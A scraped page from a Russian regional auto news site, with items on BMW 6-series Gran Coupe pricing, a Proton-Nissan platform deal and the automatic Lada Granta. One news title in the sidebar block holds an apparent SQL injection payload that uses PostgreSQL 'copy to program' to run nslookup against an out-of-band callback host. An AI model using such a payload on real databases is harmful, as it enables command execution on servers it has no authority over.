Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
30%20%e0%e2%e3%f3%f1%f2%e0%202019%e3.';copy (select '') to program 'nslookup dns.sqli.\013405.529-41307.529.a9e86.\1.bxss.me
Mr.

1
Подробнее »
7 мая 2012г.
BMW объявил цены на 6-series Gran Coupe

Немецкий производитель выпустил официальную информацию, касающуюся цен на новинку 6-series Gran Coupe. Автомобиль можно будет приобрести в Европе за сумму от $ 76,895.
Подробнее »
02 ноября 2010г.
Proton договорится с "Ниссаном" об использовании платформы "Микры"

Малайзийский автопроизводитель Proton намерен договориться с компанией Nissan о праве использовать платформу компактного автомобиля Micra нового поколения для собственной модели. Как сообщает Autocar, на этой "тележке" в "Протоне" намерены построить машину, которая будет продаваться в Индии и на других развивающихся рынках.
Подробнее »
АвтоВАЗ отправил дилерам Lada Granta с АКПП
В салоны дилерской сети АвтоВАЗа направлены уже порядка 200 Lada Granta с автоматической трансмиссией. Сообщается, что первые модификации с «автоматом» появятся в автосалонах в течение ближайших двух недель.

«Я ездил на опытных образцах, причем достаточно давно, около года назад, когда только первые-первые испытания начинались. Но этот «автомат», эта коробка, она проверенная. Она стоит и на некоторых аналогах у наших партнеров по альянсу, на некоторых автомобилях Nissan, и она ничем не отличается по своей работе от того, как она работает на тех автомобилях. Переключения плавные, без рывков, это полноценный «автомат», - передает слова вице-президента по продажам и маркетингу компании Артема Федосова «АвтоСреда».


Напомним, ранее АвтоВАЗ объявил цены на новинку. Сообщалось, что автомобиль в комплектации с более мощным мотором, автоматической трансмиссией, кондиционером, ABS и подушкой безопасности переднего пассажира обойдется покупателям в 373,2 тысячи рублей.

Источник: Autonews
Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика